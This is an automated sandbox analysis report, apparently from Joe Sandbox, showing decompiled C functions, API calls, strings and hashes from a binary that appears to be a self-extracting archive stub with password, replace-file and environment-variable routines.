Strings

Thread pool initialization failed., xrefs: 00C70EB7

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 5e15eaa339816c58bb691bab718fa6b2459eb2e550f150ef9dc0c7103db355b6
Instruction ID: b5910e18e710d52a923429c5cba9d9be492b6ee9e27e03d4776c0519b9a84348
Opcode Fuzzy Hash: 5e15eaa339816c58bb691bab718fa6b2459eb2e550f150ef9dc0c7103db355b6
Instruction Fuzzy Hash: 2B114FB1640708EBC3315F7A9C88AABFBECEB55744F24882EE1DA82200D6715A418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00C7B270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00C61316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00C6F3FA(_t24, 0xcb7a78,  &_v260);
					E00C6F445( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00c7b27a
0x00c7b27e
0x00c7b282
0x00c7b29b
0x00c7b30a
0x00000000
0x00c7b30c
0x00c7b29d
0x00c7b2a3
0x00c7b304
0x00000000
0x00c7b304
0x00c7b2a8
0x00c7b2b7
0x00000000
0x00c7b2b7
0x00c7b2ad
0x00c7b2b0
0x00c7b2d6
0x00c7b2e8
0x00c7b2f5
0x00c7b2fa
0x00c7b2bd
0x00c7b2be
0x00000000
0x00c7b2be
0x00c7b2b5
0x00c7b2bb
0x00000000
0x00c7b2bb
0x00000000

APIs

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

EndDialog.USER32(?,00000001), ref: 00C7B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00C7B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00C7B304

Strings

GETPASSWORD1, xrefs: 00C7B289

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 26bd06d7ab68a3df33aab544523714ca08f67aa180720a5ea304cceef83e9edb
Instruction ID: cf278ec07085e8b141c60b86e3dbf7690d3563461719e1f29fcd0ee8e9a1f5c2
Opcode Fuzzy Hash: 26bd06d7ab68a3df33aab544523714ca08f67aa180720a5ea304cceef83e9edb
Instruction Fuzzy Hash: 4111C432900119BADB229A65AC49FFF376DEF59710F048020FA49F2191D7A4DE459771

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7DCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t15;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xcbec88 = _a12;
				 *0xcbec8c = _a16;
				 *0xca8464 = _a20;
				if( *0xca8460 == 0) {
					if( *0xca8457 == 0) {
						_t19 = E00C7C220;
						_t15 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xca102c, _t15,  *0xca8458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xca1028, L"RENAMEDLG",  *0xca8450, E00C7D600, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x00c7dced
0x00c7dcf5
0x00c7dcfb
0x00c7dd00
0x00c7dd0d
0x00c7dd17
0x00c7dd1c
0x00c7dd46
0x00c7dd5d
0x00c7dd62
0x00000000
0x00000000
0x00c7dd44
0x00000000
0x00000000
0x00c7dd44
0x00000000
0x00c7dd68
0x00000000
0x00c7dd11
0x00000000

Strings

REPLACEFILEDLG, xrefs: 00C7DD1C, 00C7DD50
RENAMEDLG, xrefs: 00C7DD31

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: d0613dc57292b0efafb0d72ca0fd282d7580f356bf3f50304a290de0974fcd31
Instruction ID: fe9dd64b476cdb21037b17e424f1bfc501fd604d52040dd0aa5d62fba2fb6b4c
Opcode Fuzzy Hash: d0613dc57292b0efafb0d72ca0fd282d7580f356bf3f50304a290de0974fcd31
Instruction Fuzzy Hash: 73019276604245AFCB215F95FC44B9E3FB5FB19788F008425F90A83270C6319D50DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00C7DBDE(void* __eflags, WCHAR* _a4) {
				char _v8196;
				WCHAR* _t8;
				WCHAR* _t13;

				E00C7EC50(0x2000);
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t8 = E00C70371(_a4,  &_v8196, 0x1000);
				_t13 = _t8;
				if(_t13 != 0) {
					_push( *_t13 & 0x0000ffff);
					while(E00C7048D() != 0) {
						_t13 =  &(_t13[1]);
						_push( *_t13 & 0x0000ffff);
					}
					return SetEnvironmentVariableW(L"sfxpar", _t13);
				}
				return _t8;
			}

0x00c7dbe6
0x00c7dbf4
0x00c7dc09
0x00c7dc0e
0x00c7dc12
0x00c7dc17
0x00c7dc21
0x00c7dc1a
0x00c7dc20
0x00c7dc20
0x00000000
0x00c7dc30
0x00c7dc38

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00C7DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30

Strings

sfxpar, xrefs: 00C7DC2B
sfxcmd, xrefs: 00C7DBEF

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
Instruction ID: 396281f0145c348e39d9fa48edb16dfb19983bf8cec64ce8b388a2a97b5e6ce8
Opcode Fuzzy Hash: 51909117f5e441a812e115285e571af4ac71d2ef696b72ef9e9932fcec6d4d08
Instruction Fuzzy Hash: 2DF0ECB2504224A7DF221F958C0ABFE3B68BF04785F044451BD8E95165E7B08940D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00C89A1E Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00C89A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00C84636(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00C7EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00C7EE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xc852a1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00C7FFF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00C7EE10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00C92260();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00C92260();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00C92260();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00C89D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00C92430(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00C891A8();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00C89087();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00c89a1e
0x00c89a29
0x00c89a30
0x00c89a32
0x00c89a32
0x00c89a34
0x00c89a3d
0x00c89a3f
0x00c89a44
0x00c89a4a
0x00c89a60
0x00c89a65
0x00c89a68
0x00c89a75
0x00c89a7a
0x00c89ace
0x00c89ad6
0x00c89ad8
0x00c89ada
0x00c89add
0x00c89add
0x00c89add
0x00c89ae3
0x00c89aeb
0x00c89afe
0x00c89b01
0x00c89b03
0x00c89b06
0x00c89b07
0x00c89b28
0x00c89b2b
0x00c89b2b
0x00c89b09
0x00c89b09
0x00c89b0b
0x00c89b16
0x00c89b16
0x00c89b18
0x00c89b1f
0x00c89b1a
0x00c89b1a
0x00c89b1a
0x00c89b18
0x00c89b2c
0x00c89b2e
0x00c89b2f
0x00c89b32
0x00c89b34
0x00c89b48
0x00c89b36
0x00c89b36
0x00c89b36
0x00c89b4d
0x00c89b4d
0x00c89b52
0x00c89b55
0x00c89b60
0x00c89b60
0x00c89b60
0x00c89b60
0x00c89b64
0x00c89b6b
0x00c89b6c
0x00c89b6f
0x00c89b72
0x00c89b72
0x00c89b74
0x00000000
0x00000000
0x00c89b8c
0x00c89b93
0x00c89b97
0x00c89b9a
0x00c89b9d
0x00c89b9f
0x00c89b9f
0x00c89b9f
0x00c89ba1
0x00c89ba4
0x00c89ba7
0x00c89ba9
0x00c89bb1
0x00c89bb7
0x00c89bba
0x00c89bbd
0x00c89bbe
0x00c89bc1
0x00c89bc4
0x00c89bc4
0x00c89bc9
0x00c89bcc
0x00000000
0x00000000
0x00c89be4
0x00c89be9
0x00c89bed
0x00000000
0x00000000
0x00c89bf1
0x00c89bf1
0x00c89bf4
0x00c89bf5
0x00c89bf5
0x00c89bf7
0x00c89bfa
0x00000000
0x00000000
0x00c89bfc
0x00c89bff
0x00c89c06
0x00c89c09
0x00c89c0c
0x00c89c22
0x00c89c22
0x00c89c22
0x00c89c0e
0x00c89c0e
0x00c89c10
0x00c89c13
0x00c89c1e
0x00c89c15
0x00c89c18
0x00c89c18
0x00c89c13
0x00000000
0x00c89c0c
0x00c89c01
0x00c89c01
0x00c89c03
0x00c89c03
0x00c89b57
0x00c89b57
0x00c89b5a
0x00c89c25
0x00c89c25
0x00c89c27
0x00c89c29
0x00c89c2c
0x00c89c2d
0x00c89c2e
0x00c89c2f
0x00c89c37
0x00c89c37
0x00c89c37
0x00c89c39
0x00c89c3c
0x00c89c3f
0x00c89c41
0x00c89c41
0x00c89c43
0x00c89c55
0x00c89c59
0x00c89c5c
0x00c89c63
0x00c89c6b
0x00c89c6b
0x00c89c6e
0x00c89c70
0x00c89c81
0x00c89c81
0x00c89c85
0x00c89c85
0x00c89c88
0x00c89c8a
0x00c89c8d
0x00000000
0x00c89c72
0x00c89c72
0x00c89c78
0x00c89c78
0x00c89c7c
0x00c89c8f
0x00c89c8f
0x00c89c93
0x00c89c94
0x00c89c96
0x00c89c98
0x00c89cd9
0x00c89cd9
0x00c89cdb
0x00c89ce8
0x00c89ce8
0x00c89cea
0x00c89cec
0x00c89ced
0x00c89cee
0x00c89cf5
0x00c89cf8
0x00c89cfa
0x00c89cfa
0x00c89cfb
0x00c89cfd
0x00c89d00
0x00c89d00
0x00c89d02
0x00c89d04
0x00000000
0x00c89d04
0x00c89cdd
0x00c89cdf
0x00000000
0x00000000
0x00c89ce1
0x00000000
0x00000000
0x00c89ce3
0x00c89ce6
0x00000000
0x00000000
0x00000000
0x00c89ce6
0x00c89c9f
0x00c89ca5
0x00c89ca5
0x00c89ca7
0x00c89ca8
0x00c89ca9
0x00c89caa
0x00c89cb1
0x00c89cb4
0x00c89cb6
0x00c89cb7
0x00c89cb9
0x00c89cc6
0x00c89cc6
0x00c89cc8
0x00c89cca
0x00c89ccb
0x00c89ccc
0x00c89cd3
0x00c89cd6
0x00c89cd8
0x00c89cd8
0x00000000
0x00c89cd8
0x00c89cbb
0x00c89cbb
0x00c89cbd
0x00000000
0x00000000
0x00c89cbf
0x00000000
0x00000000
0x00c89cc1
0x00c89cc4
0x00000000
0x00000000
0x00000000
0x00c89cc4
0x00c89ca1
0x00c89ca3
0x00000000
0x00000000
0x00000000
0x00c89ca3
0x00c89c74
0x00c89c76
0x00000000
0x00000000
0x00000000
0x00c89c76
0x00c89c70
0x00000000
0x00c89b5a
0x00c89b55
0x00c89a7c
0x00c89a7e
0x00000000
0x00c89a80
0x00c89a96
0x00c89a9b
0x00c89a9d
0x00c89aa9
0x00c89aaf
0x00c89ab0
0x00c89ab2
0x00c89ab4
0x00c89abf
0x00c89abf
0x00c89ac2
0x00c89ac4
0x00c89ac4
0x00c89ac7
0x00c89a9f
0x00c89a9f
0x00c89a9f
0x00000000
0x00c89a9d
0x00c89a4c
0x00c89a4c
0x00c89a53
0x00c89a54
0x00c89a56
0x00c89d08
0x00c89d0c
0x00c89d11
0x00c89d11
0x00c89d20
0x00c89d20

APIs

_strrchr.LIBCMT ref: 00C89AA9
__alldvrm.LIBCMT ref: 00C89CAA
__alldvrm.LIBCMT ref: 00C89CCC

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 0cf895d104470bc0ca7879bd750488f756615a90efb731e7d6082eeb681e3486
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: EDA18B72A003869FEB25EF68C8817BEBBE5EF55318F2C416DE4959B281C3358E41C758

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A354 Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00C6A354(void* __edx) {
				signed char _t41;
				void* _t42;
				void* _t53;
				signed char _t70;
				void* _t78;
				signed int* _t79;
				signed int* _t80;
				void* _t81;
				signed int* _t82;
				void* _t83;

				_t78 = __edx;
				E00C7EC50(0x1024);
				_t80 =  *(_t83 + 0x1038);
				_t70 = 1;
				if(_t80 == 0) {
					L2:
					 *(_t83 + 0x11) = 0;
					L3:
					_t79 =  *(_t83 + 0x1040);
					if(_t79 == 0) {
						L5:
						 *(_t83 + 0x13) = 0;
						L6:
						_t82 =  *(_t83 + 0x1044);
						if(_t82 == 0) {
							L8:
							 *(_t83 + 0x12) = 0;
							L9:
							_t41 = E00C6A243( *(_t83 + 0x1038));
							 *(_t83 + 0x18) = _t41;
							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
								_t70 = 0;
							} else {
								E00C6A4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
							}
							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t83 + 0x14) = _t42;
							if(_t42 != 0xffffffff) {
								L16:
								if( *(_t83 + 0x11) != 0) {
									E00C7138A(_t80, _t78, _t83 + 0x1c);
								}
								if( *(_t83 + 0x13) != 0) {
									E00C7138A(_t79, _t78, _t83 + 0x2c);
								}
								if( *(_t83 + 0x12) != 0) {
									E00C7138A(_t82, _t78, _t83 + 0x24);
								}
								_t81 =  *(_t83 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
								_t53 = CloseHandle(_t81);
								if(_t70 != 0) {
									_t53 = E00C6A4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
								}
								goto L24;
							} else {
								_t53 = E00C6BB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
								if(_t53 == 0) {
									L24:
									return _t53;
								}
								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t83 + 0x14) = _t53;
								if(_t53 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t83 + 0x12) = _t70;
						if(( *_t82 | _t82[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t83 + 0x13) = _t70;
					if(( *_t79 | _t79[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t83 + 0x11) = 1;
				if(( *_t80 | _t80[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00c6a354
0x00c6a359
0x00c6a365
0x00c6a36c
0x00c6a370
0x00c6a37d
0x00c6a37d
0x00c6a381
0x00c6a381
0x00c6a38a
0x00c6a397
0x00c6a397
0x00c6a39b
0x00c6a39b
0x00c6a3a4
0x00c6a3b2
0x00c6a3b2
0x00c6a3b6
0x00c6a3bd
0x00c6a3c2
0x00c6a3c9
0x00c6a3df
0x00c6a3cf
0x00c6a3d8
0x00c6a3d8
0x00c6a3fa
0x00c6a400
0x00c6a407
0x00c6a451
0x00c6a456
0x00c6a45f
0x00c6a45f
0x00c6a469
0x00c6a472
0x00c6a472
0x00c6a47c
0x00c6a485
0x00c6a485
0x00c6a495
0x00c6a499
0x00c6a4a9
0x00c6a4b9
0x00c6a4bf
0x00c6a4c6
0x00c6a4ce
0x00c6a4db
0x00c6a4db
0x00000000
0x00c6a409
0x00c6a41a
0x00c6a421
0x00c6a4e4
0x00c6a4ea
0x00c6a4ea
